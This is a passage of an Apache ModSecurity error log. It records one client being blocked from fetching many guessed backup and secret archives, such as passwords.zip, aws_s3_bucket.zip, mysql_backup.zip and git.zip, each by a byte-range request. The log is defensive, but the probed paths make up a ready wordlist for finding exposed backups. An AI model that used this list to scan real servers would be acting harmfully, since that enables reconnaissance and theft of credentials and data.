[ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/administrator-backup.zip"] [unique_id "aa2sJzLobmDOvyRcAEhflwAAAMQ"] [Sun Mar 08 19:04:39.734633 2026] [:error] [pid 12902:tid 12937] [client 35.189.151.148:44660] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/wordpress-admin.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAmQAAAoI"] [Sun Mar 08 19:04:39.734669 2026] [:error] [pid 27307:tid 27325] [client 35.189.151.148:41588] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_security_groups.zip"] [unique_id "aa2sJwo1nI2o7tYBWw9SZAAAAVA"] [Sun Mar 08 19:04:39.734944 2026] [:error] [pid 12902:tid 12945] [client 35.189.151.148:39556] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/public_html_backup.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAmgAAAoo"] [Sun Mar 08 19:04:39.734969 2026] [:error] [pid 29564:tid 29577] [client 35.189.151.148:39906] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/catalog.zip"] [unique_id "aa2sJwemqWLB0zKFm0TYSQAAAQU"] [Sun Mar 08 19:04:39.735069 2026] [:error] [pid 12902:tid 12957] [client 35.189.151.148:60660] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_development.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAmwAAApY"] [Sun Mar 08 19:04:39.737207 2026] [:error] [pid 13471:tid 13490] [client 35.189.151.148:44632] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/business.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD33QAAAA8"] [Sun Mar 08 19:04:39.737286 2026] [:error] [pid 13471:tid 13488] [client 35.189.151.148:40394] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/2020-backup.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD33gAAAA0"] [Sun Mar 08 19:04:39.737288 2026] [:error] [pid 13472:tid 13512] [client 35.189.151.148:38290] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-data.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8uwAAAEk"] [Sun Mar 08 19:04:39.737351 2026] [:error] [pid 12902:tid 12943] [client 35.189.151.148:37356] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/root-backup.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAnQAAAog"] [Sun Mar 08 19:04:39.737427 2026] [:error] [pid 12902:tid 12944] [client 35.189.151.148:43918] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_s3_bucket.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAngAAAok"] [Sun Mar 08 19:04:39.737556 2026] [:error] [pid 13471:tid 13490] [client 35.189.151.148:40616] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/may.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD33wAAAA8"] [Sun Mar 08 19:04:39.737610 2026] [:error] [pid 13471:tid 13488] [client 35.189.151.148:37390] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/alerts.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD34AAAAA0"] [Sun Mar 08 19:04:39.737630 2026] [:error] [pid 13473:tid 13522] [client 35.189.151.148:44724] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-snapshots.zip"] [unique_id "aa2sJ0wwZGElJGd8aN_6DwAAAIQ"] [Sun Mar 08 19:04:39.737672 2026] [:error] [pid 29564:tid 29585] [client 35.189.151.148:41078] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup-old.zip"] [unique_id "aa2sJwemqWLB0zKFm0TYSgAAAQ0"] [Sun Mar 08 19:04:39.737746 2026] [:error] [pid 12902:tid 12954] [client 35.189.151.148:40822] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup-2025.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAnAAAApM"] [Sun Mar 08 19:04:39.740034 2026] [:error] [pid 13471:tid 13484] [client 35.189.151.148:42242] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/2.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD34QAAAAk"] [Sun Mar 08 19:04:39.740056 2026] [:error] [pid 13472:tid 13537] [client 35.189.151.148:41950] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/symfony.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8vAAAAFU"] [Sun Mar 08 19:04:39.740072 2026] [:error] [pid 27307:tid 27326] [client 35.189.151.148:39054] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_terraform.zip"] [unique_id "aa2sJwo1nI2o7tYBWw9SZQAAAVE"] [Sun Mar 08 19:04:39.740257 2026] [:error] [pid 12819:tid 12869] [client 35.189.151.148:40410] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/package-lock.zip"] [unique_id "aa2sJ_NtUJnAKTO-2_-25AAAAlg"] [Sun Mar 08 19:04:39.740257 2026] [:error] [pid 11078:tid 11121] [client 35.189.151.148:39292] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/passwords.zip"] [unique_id "aa2sJ3-dmvIeGeY060kikwAAAcs"] [Sun Mar 08 19:04:39.740263 2026] [:error] [pid 11078:tid 11127] [client 35.189.151.148:40076] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/sftp.zip"] [unique_id "aa2sJ3-dmvIeGeY060kikgAAAdE"] [Sun Mar 08 19:04:39.740358 2026] [:error] [pid 13471:tid 13484] [client 35.189.151.148:43132] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/mercurial.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD34gAAAAk"] [Sun Mar 08 19:04:39.740395 2026] [:error] [pid 13473:tid 13536] [client 35.189.151.148:40296] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/cart.zip"] [unique_id "aa2sJ0wwZGElJGd8aN_6EAAAAIw"] [Sun Mar 08 19:04:39.740655 2026] [:error] [pid 12902:tid 12959] [client 35.189.151.148:41398] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/mysql_backup.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAnwAAApg"] [Sun Mar 08 19:04:39.740658 2026] [:error] [pid 29564:tid 29580] [client 35.189.151.148:44156] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-ami-backup.zip"] [unique_id "aa2sJwemqWLB0zKFm0TYSwAAAQg"] [Sun Mar 08 19:04:39.744410 2026] [:error] [pid 13472:tid 13519] [client 35.189.151.148:37654] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup-06.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8vQAAAE0"] [Sun Mar 08 19:04:39.744419 2026] [:error] [pid 11078:tid 11110] [client 35.189.151.148:40196] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/wp_backup.zip"] [unique_id "aa2sJ3-dmvIeGeY060kilAAAAcA"] [Sun Mar 08 19:04:39.744466 2026] [:error] [pid 12819:tid 12862] [client 35.189.151.148:37662] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/configuration.zip"] [unique_id "aa2sJ_NtUJnAKTO-2_-25QAAAlE"] [Sun Mar 08 19:04:39.744505 2026] [:error] [pid 29564:tid 29594] [client 35.189.151.148:38306] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/admincp.zip"] [unique_id "aa2sJwemqWLB0zKFm0TYTAAAARY"] [Sun Mar 08 19:04:39.744543 2026] [:error] [pid 13605:tid 13626] [client 35.189.151.148:39702] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/json.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfmAAAANM"] [Sun Mar 08 19:04:39.744780 2026] [:error] [pid 29564:tid 29593] [client 35.189.151.148:41100] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup_01012025.zip"] [unique_id "aa2sJwemqWLB0zKFm0TYTQAAARU"] [Sun Mar 08 19:04:39.744812 2026] [:error] [pid 12819:tid 12865] [client 35.189.151.148:43806] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/admin.zip"] [unique_id "aa2sJ_NtUJnAKTO-2_-25gAAAlQ"] [Sun Mar 08 19:04:39.745130 2026] [:error] [pid 13473:tid 13534] [client 35.189.151.148:40536] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_billing.zip"] [unique_id "aa2sJ0wwZGElJGd8aN_6EQAAAIs"] [Sun Mar 08 19:04:39.746544 2026] [:error] [pid 13472:tid 13541] [client 35.189.151.148:40242] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/full-backup.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8vgAAAFc"] [Sun Mar 08 19:04:39.746546 2026] [:error] [pid 12902:tid 12935] [client 35.189.151.148:39120] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_ebs.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAoAAAAoA"] [Sun Mar 08 19:04:39.746601 2026] [:error] [pid 7010:tid 7061] [client 35.189.151.148:43230] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/git.zip"] [unique_id "aa2sJ5q2Bzew8vjPgCG-agAAAZg"] [Sun Mar 08 19:04:39.746620 2026] [:error] [pid 13605:tid 13612] [client 35.189.151.148:43890] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/linode.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfmQAAAMU"] [Sun Mar 08 19:04:39.746644 2026] [:error] [pid 7010:tid 7040] [client 35.189.151.148:38928] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/archive_1.zip"] [unique_id "aa2sJ5q2Bzew8vjPgCG-awAAAYM"] [Sun Mar 08 19:04:39.746840 2026] [:error] [pid 12902:tid 12955] [client 35.189.151.148:42326] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/email-backup.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAoQAAApQ"] [Sun Mar 08 19:04:39.746846 2026] [:error] [pid 7010:tid 7057] [client 35.189.151.148:44622] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/data.zip"] [unique_id "aa2sJ5q2Bzew8vjPgCG-aQAAAZQ"] [Sun Mar 08 19:04:39.746953 2026] [:error] [pid 13473:tid 13551] [client 35.189.151.148:39026] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data 